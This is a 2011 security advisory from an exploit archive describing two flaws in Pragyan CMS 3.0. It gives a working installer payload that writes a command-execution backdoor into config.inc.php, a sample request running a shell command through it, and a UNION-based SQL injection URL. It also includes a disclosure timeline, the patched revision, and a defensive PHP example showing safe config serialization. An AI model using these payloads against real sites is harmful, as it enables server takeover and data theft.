
Pragyan CMS v 3.0 multiple Vulnerabilities

26 Feb 2011 00:00:00 | Reported by Abhishek Lyall | Type: zdt | Source: 0day.today

Pragyan CMS v 3.0 multiple Vulnerabilities - Code execution and SQL injectio

Code
#Pragyan CMS v 3.0 multiple Vulnerabilities
#Author Villy and Abhishek Lyall - villys777[at]gmail[dot]com, abhilyall[at]gmail[dot]com
#Web - http://www.aslitsecurity.com/
#Blog - http://bugix-security.blogspot.com
#http://www.aslitsecurity.blogspot.com/
#Pragyan CMS v 3.0

Technical Description


1) Code execution in INSTALL/install.php
The script does not correctly validate the entered fields.
It is possible to write the following string into the password field:

");echo exec($_GET["a"]);echo ("

or into other fields with JavaScript turned off.
cms/config.inc.php will then contain the code:
define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");
which allows command execution.

EXPLOIT:: http://target.com/blog/cms/config.inc.php?a=ls -la
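
The flaw in item 1 comes from pasting a form value between double quotes in generated PHP source. The sketch below is an added example, not code from Pragyan CMS or the advisory authors: it contrasts that pattern (assumed from the config.inc.php line quoted above) with a writer that serializes the value using var_export(), plus a tokenizer self-check; all function names are hypothetical.

```php
<?php
// Added example, not Pragyan CMS code; all function names are hypothetical.

// Pattern assumed from the advisory's config.inc.php output: the form value
// is pasted between double quotes, so a '"' in it ends the string literal
// and the rest of the value is emitted as PHP statements.
function render_define_unsafe(string $name, string $value): string
{
    return 'define("' . $name . '","' . $value . '");' . "\n";
}

// Hardened writer: var_export() returns a quoted PHP string literal with
// quotes and backslashes escaped, so the value cannot leave the literal.
function render_define_safe(string $name, string $value): string
{
    if (!preg_match('/^[A-Z][A-Z0-9_]*$/', $name)) {
        throw new InvalidArgumentException('unexpected constant name');
    }
    return 'define(' . var_export($name, true) . ', '
         . var_export($value, true) . ");\n";
}

// Installer self-check: tokenize the generated source and count statement
// terminators. One define() line must contain exactly one ';' token.
function statement_count(string $php): int
{
    $count = 0;
    foreach (token_get_all('<?php ' . $php) as $token) {
        if ($token === ';') {
            $count++;
        }
    }
    return $count;
}

// Password field value quoted in the advisory, used as test input.
$input = '");echo exec($_GET["a"]);echo ("';

foreach (['render_define_unsafe', 'render_define_safe'] as $writer) {
    $line = $writer('MYSQL_PASSWORD', $input);
    $verdict = statement_count($line) === 1 ? 'ok' : 'REJECT';
    printf("%-22s %-7s %s", $writer, $verdict, $line);
}
```

Both the serialization and the self-check belong in the server-side installer, since the advisory indicates that the form's checks no longer apply once JavaScript is turned off.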

2) SQL injection
- get MySQL version EXPLOIT::
http://target.com/path/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,concat(unhex(Hex(cast(@@version as char)))),null,null,null--

Solution
Update to Pragyan CMS 3.0 rev.274

Changelog
2011-19-02 : Initial release
2011-20-02 : Reported to vendor
2011-25-02 : Patch released
2011-25-02 : Public disclosure

Credits
Villy
Abhishek Lyall
pragyan.org
http://bugix-security.blogspot.com
http://www.aslitsecurity.blogspot.com/



#  0day.today [2018-04-05]  #
